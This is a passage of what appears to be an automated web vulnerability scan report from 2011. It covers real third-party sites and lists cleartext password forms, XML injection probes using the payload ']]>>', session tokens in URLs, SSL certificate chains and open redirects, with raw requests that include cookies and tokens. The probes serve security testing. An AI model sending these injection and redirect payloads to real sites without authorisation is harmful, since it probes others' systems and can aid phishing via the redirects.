The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Chat.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.8.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 20808

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Chat.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
6.9. http://www.livewithoscar.com/DailyOmni.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /DailyOmni.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /DailyOmni.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.2.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:23 GMT
Content-Length: 44997

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts ar
...[SNIP]...
</script>
<form name="form2" method="post" action="DailyOmni.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
6.10. http://www.livewithoscar.com/FlashIframe.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /FlashIframe.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /FlashIframe.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.1.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:07 GMT
Content-Length: 13776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta id="RefreshPer
...[SNIP]...
</script>
<form name="form2" method="post" action="FlashIframe.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
7. XML injection  previous  next
There are 4 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

7.1. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 295
Date: Tue, 14 Jun 2011 00:14:01 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/follow_button.html</Key><RequestId>7A323588EB26C97F</Requ
...[SNIP]...
7.2. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/follow_button.html]]>>?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 295
Date: Tue, 14 Jun 2011 00:14:04 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/follow_button.html]]&gt;&gt;</Key><RequestId>3B85B8189F04A81E</Requ
...[SNIP]...
7.3. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /e]]>>/getdata.xgi?dt=br&pkey=kdii33k3nlxia&ru=http%3A%2F%2Fpix04.revsci.net%2FD08734%2Fa1%2F0%2F3%2F0.js%3FD%3DDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D%3Cna_da%3E%252526naid%25253D%3Cna_id%3E%252526namp%25253D%3Cna_mp%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Tue, 14 Jun 2011 00:14:15 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
7.4. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /e/getdata.xgi]]>>?dt=br&pkey=kdii33k3nlxia&ru=http%3A%2F%2Fpix04.revsci.net%2FD08734%2Fa1%2F0%2F3%2F0.js%3FD%3DDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D%3Cna_da%3E%252526naid%25253D%3Cna_id%3E%252526namp%25253D%3Cna_mp%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Tue, 14 Jun 2011 00:14:16 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://pixel.alexametrics.com/atrk.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pixel.alexametrics.com
Path:   /atrk.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /atrk.gif?random_number=13442793427&jsv=20090615&user_cookie=8a1417a21308b8c7cc21f56479b&user_cookie_flag=1&sess_cookie=8a1417a21308b8c7cc21f56479b&sess_cookie_flag=1&host_url=http%3A%2F%2Fwww.alexa.com%2F&ref_url=&cookie_enabled=1&java_enabled=1&screen_params=1920x1200x32&flashver=10.3.181&time=1308011297988&time_zone_offset=300&title=Alexa%20the%20Web%20Information%20Company&domain=alexa.com&label=home&account=s3LE913x9k00WW HTTP/1.1
Host: pixel.alexametrics.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: lmHgGpu5SwPHhUUBdI1jpDyd/Ui6DI/aW6ImgDlWJVtPnCrayfTKY/P7gzpq86od
x-amz-request-id: EE6A63A80097A9E8
Date: Fri, 13 May 2011 12:53:46 GMT
x-amz-meta-alexa-last-modified: 20110117123941
Last-Modified: Mon, 17 Jan 2011 20:41:40 GMT
ETag: "221d8352905f2c38b3cb2bd191d630b0"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 43
Server: AmazonS3
Age: 70459
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 564a64f1818853969657bce8dfc50ec6c5ec134108ef42980a20660d202595fa1c91c37f35e03ab6
Via: 1.0 c662f4e5a3bc7b224ce1bbecb0a23d82.cloudfront.net:11180 (CloudFront), 1.0 f633d3d099dda5545ae196d0f3869b62.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

GIF89a.............!.......,...........D..;
8.2. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26ad6e48%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df282e93c28%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6e479cc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df103fe2ee%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df664004d4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.34
X-Cnection: close
Date: Tue, 14 Jun 2011 00:13:56 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f103fe2ee&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff2bfe1068&relation=parent&transport=postmessage&frame=f37019a21c", "http:\/\/o
...[SNIP]...
9. SSL certificate  previous  next
There are 6 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

9.1. https://login.yahoo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  login.yahoo.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 20 18:00:00 CST 2010
Valid to:  Thu Jan 03 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Jan 13 13:20:32 CST 2010
Valid to:  Wed Sep 30 13:19:47 CDT 2015

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
9.2. https://buy.wsj.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  buy.wsj.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Oct 06 19:00:00 CDT 2010
Valid to:  Sun Oct 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
9.3. https://edit.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  edit.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed May 19 03:54:49 CDT 2010
Valid to:  Wed Jun 19 17:41:46 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
9.4. https://en.wordpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.wordpress.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Oct 14 06:29:26 CDT 2010
Valid to:  Wed Oct 14 06:29:26 CDT 2015

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
9.5. https://login21.marketingsolutions.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login21.marketingsolutions.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.marketingsolutions.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Aug 23 12:36:40 CDT 2006
Valid to:  Tue Aug 23 12:36:40 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
9.6. https://marketingsolutions.login.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  marketingsolutions.login.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Fri Feb 01 17:41:33 CST 2008
Valid to:  Thu Jan 31 17:41:33 CST 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
10. Open redirection  previous  next
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

10.1. http://b.scorecardresearch.com/r [d.c parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a54e375280e0c6b5c/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035148&d.c=http%3a//a54e375280e0c6b5c/a%3fgif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a54e375280e0c6b5c/a?gif
Date: Tue, 14 Jun 2011 00:13:57 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.2. http://r.nexac.com/e/getdata.xgi [ru parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//a7f01869e5f0330bd/a%3fhttp%3a//pix04.revsci.net/D08734/a1/0/3/0.js%3fD%3dDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D<na_da>%252526naid%25253D<na_id>%252526namp%25253D<na_mp> was submitted in the ru parameter. This caused a redirection to the following URL:

Request

GET /e/getdata.xgi?dt=br&pkey=kdii33k3nlxia&ru=http%3a//a7f01869e5f0330bd/a%3fhttp%3a//pix04.revsci.net/D08734/a1/0/3/0.js%3fD%3dDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D<na_da>%252526naid%25253D<na_id>%252526namp%25253D<na_mp> HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Location: http://a7f01869e5f0330bd/a?http://pix04.revsci.net/D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D
Content-type: text/html
Date: Tue, 14 Jun 2011 00:14:02 GMT
Server: lighttpd/1.4.18
Content-Length: 1


11. Cookie scoped to parent domain  previous  next
There are 48 instances of this issue:

Issue background

